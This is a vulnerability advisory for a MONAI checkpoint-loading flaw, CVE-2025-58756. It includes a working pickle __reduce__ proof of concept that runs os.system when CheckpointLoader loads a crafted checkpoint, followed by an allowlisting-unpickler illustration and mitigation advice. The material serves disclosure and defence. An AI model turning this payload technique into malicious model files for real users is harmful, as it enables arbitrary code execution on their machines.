CVE-2025-58756: MONAI: Unsafe torch usage may lead to arbitrary code execution
In monai/bundle/scripts.py the call `model_dict = torch.load(full_path, map_location=torch.device(device), weights_only=True)` loads a model securely, because `weights_only=True` restricts unpickling to tensor data and refuses arbitrary globals. Insecure `torch.load` calls remain elsewhere in the project, however, notably on the checkpoint-loading path.
Loading checkpoints downloaded from third-party hubs such as huggingface is common practice for users who want to cut training time and cost by starting from pre-trained weights. A checkpoint is a pickle archive, so loading one that contains a malicious object triggers pickle deserialization and arbitrary code execution in the loading process, before the caller ever inspects the checkpoint contents.
The following proof of concept demonstrates the issue by feeding a crafted checkpoint to `monai.handlers.CheckpointLoader`.
```python
import os
import tempfile
from pathlib import Path

import torch
import torch.nn as nn


class MaliciousPayload:
    # pickle stores this object as the (callable, args) pair returned by __reduce__;
    # the unpickler calls os.system("touch /tmp/hacker2.txt") when the checkpoint is loaded.
    def __reduce__(self):
        return (os.system, ('touch /tmp/hacker2.txt',))


def test_checkpoint_loader_attack():
    temp_dir = Path(tempfile.mkdtemp())
    checkpoint_file = temp_dir / "malicious_checkpoint.pt"
    # Looks like an ordinary training checkpoint, but the state dict slot holds the payload
    malicious_checkpoint = {
        'model_state_dict': MaliciousPayload(),
        'optimizer_state_dict': {},
        'epoch': 100
    }
    torch.save(malicious_checkpoint, checkpoint_file)

    from monai.handlers import CheckpointLoader
    model = nn.Linear(10, 1)
    loader = CheckpointLoader(
        load_path=str(checkpoint_file),
        load_dict={"model": model}
    )

    # Minimal stand-in for an ignite Engine: the handler only reads engine.state
    class MockEngine:
        def __init__(self):
            self.state = type('State', (), {})()
            self.state.max_epochs = None
            self.state.epoch = 0

    engine = MockEngine()
    # The payload fires inside torch.load, before the handler validates the checkpoint;
    # any error raised afterwards (the payload is not a valid state dict) does not matter
    try:
        loader(engine)
    except Exception:
        pass

    proof_file = "/tmp/hacker2.txt"
    if os.path.exists(proof_file):
        print("Success")


if __name__ == "__main__":
    test_checkpoint_loader_attack()
```
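As an added illustration, not code from this advisory or from MONAI, the block below models in plain `pickle` what separates the vulnerable `torch.load` call from the hardened `weights_only=True` one. A torch checkpoint is a pickle archive, and weights-only loading works by unpickling through a restricted `find_class` allowlist, so a `__reduce__` payload can no longer resolve `os.system` or any other global; torch's real allowlist additionally covers its own tensor and storage types. The checkpoint contents, the environment-variable marker, the `builtins.exec` stand-in for `os.system` and the allowlist are constructed for the example. One caveat for anyone reproducing the PoC above: torch 2.6 changed the default of `weights_only` to `True`, so on a current torch the payload only fires where the caller passes `weights_only=False` explicitly, while older versions unpickle without restriction by default.

```python
import io
import os
import pickle
from collections import OrderedDict

# Constructed marker: the stand-in payload sets this environment variable in the
# loading process instead of touching the filesystem like the PoC's os.system call.
MARKER_ENV = "MONAI_POC_PAYLOAD_RAN"


def payload_ran() -> bool:
    """True if the payload executed in this process."""
    return os.environ.get(MARKER_ENV) == "1"


def reset_marker() -> None:
    os.environ.pop(MARKER_ENV, None)


class MaliciousPayload:
    # pickle serialises an object as the (callable, args) pair returned by __reduce__
    # and the unpickler calls callable(*args) on load. The PoC uses os.system; this
    # harmless variant uses builtins.exec to set a marker, which proves the same thing:
    # arbitrary Python runs before the caller ever sees the checkpoint.
    def __reduce__(self):
        return (exec, (f"import os; os.environ['{MARKER_ENV}'] = '1'",))


def build_malicious_checkpoint() -> bytes:
    """Checkpoint-shaped pickle whose state dict slot holds the payload (constructed sample)."""
    return pickle.dumps({"model_state_dict": MaliciousPayload(),
                         "optimizer_state_dict": {}, "epoch": 100})


def build_benign_checkpoint() -> bytes:
    """Checkpoint-shaped pickle holding plain data that stands in for tensors (constructed)."""
    state = OrderedDict([("weight", [[0.1] * 10]), ("bias", [0.0])])
    return pickle.dumps({"model_state_dict": state,
                         "optimizer_state_dict": {}, "epoch": 100})


class WeightsOnlyUnpickler(pickle.Unpickler):
    """Allowlisting unpickler built on the same principle as torch.load(weights_only=True).

    find_class is consulted for every GLOBAL/STACK_GLOBAL opcode, i.e. for every
    callable or class the pickle stream wants to resolve. Refusing anything outside
    the allowlist means a __reduce__ payload cannot name os.system, exec or anything
    else; the load aborts before the REDUCE opcode that would call it.
    """
    ALLOWED = {("collections", "OrderedDict")}  # torch's list is longer (tensor/storage types)

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name}: not in the weights-only allowlist")


def load_checkpoint(data: bytes, weights_only: bool):
    """Returns ("ok", checkpoint) or ("rejected", reason).

    weights_only=False mirrors the vulnerable torch.load call: pickle resolves any global.
    weights_only=True mirrors the hardened call: a global outside the allowlist aborts the load.
    """
    try:
        if weights_only:
            ckpt = WeightsOnlyUnpickler(io.BytesIO(data)).load()
        else:
            ckpt = pickle.loads(data)
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))
    return ("ok", ckpt)


if __name__ == "__main__":
    reset_marker()
    print(load_checkpoint(build_malicious_checkpoint(), weights_only=False)[0], payload_ran())
    reset_marker()
    print(load_checkpoint(build_malicious_checkpoint(), weights_only=True)[0], payload_ran())
    print(load_checkpoint(build_benign_checkpoint(), weights_only=True)[0], payload_ran())
```

The unrestricted load reports `ok` with the marker set, the restricted load of the same bytes is rejected with the marker still unset, and a benign checkpoint still loads under the restriction. The practical rule this encodes: pass `weights_only=True` on every `torch.load` of untrusted input, and treat a checkpoint that needs `weights_only=False` as untrusted code rather than data.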